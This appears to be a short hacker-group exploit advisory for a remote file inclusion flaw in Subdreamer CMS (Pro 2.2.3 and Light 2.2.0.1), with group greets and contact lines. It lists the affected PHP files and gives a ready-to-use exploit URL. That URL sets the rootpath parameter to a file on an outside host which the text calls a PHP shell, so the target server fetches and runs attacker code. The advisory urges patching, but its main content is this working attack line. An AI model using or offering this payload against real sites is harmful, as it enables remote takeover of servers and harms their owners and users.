Hello world ;)
A serious exploit has recently been discovered which will allow hackers to gain admin access to the
latest versions of Subdreamer CMS (Pro 2.2.3 and Light 2.2.0.1). It is crucial to patch your systems
immediately.
Affected files:
admin/adminfunctions.php
includes/functions.php
includes/globalfunctions.php
=) $rootpath
exploit:
http://target.com/admin/adminfunctions.php?rootpath=http://somesite.com/includes/globalfunctions.php
where "globalfunctions.php" is a php-shell ;)
Vendor info:
http://www.subdreamer.com/forum/showthread.php?p=37279#post37279
All done by JET[CTH] feet B0FH[CTH] ;)
Greets: dm-club, ckt ;)
contact info: [email protected]